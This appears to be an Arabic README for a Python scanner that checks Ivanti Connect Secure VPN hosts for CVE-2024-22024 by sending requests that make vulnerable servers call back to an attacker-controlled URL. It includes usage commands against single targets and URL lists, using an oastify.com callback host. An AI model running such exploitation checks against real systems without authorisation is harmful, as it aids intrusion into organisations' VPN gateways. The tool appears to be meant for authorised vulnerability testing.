
تحقق من وجود ثغرة CVE-2024-22024 في Ivanti Connect Secure
تحقق من ثغرة CVE-2024-22024 في Ivanti Connect Secure
[!WARNING] لأغراض تعليمية واختبارات مصرح بها فقط.
-u أو --target_url: عنوان URL المستهدف لـ Ivanti Connect Secure (ICS) أو ملف بقائمة عناوين URL.
-c أو --attacker_url: عنوان URL للمهاجم (قم بإنشاء واحد باستخدام Burp Collaborator أو ngrok أو باستخدام عنوان URL فريد من Webhook.site)
-t أو --timeout: مهلة زمنية بالثواني للطلب (الافتراضي 3 ثوانٍ)
اختبار عنوان URL واحد:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
اختبار قائمة عناوين URL:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
استخدام مهلة زمنية مختلفة (5 ثوانٍ):
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
من اكتشف الثغرة.. لقد قرأت برهان المفهوم وقمت بأتمتة هذا الأمر.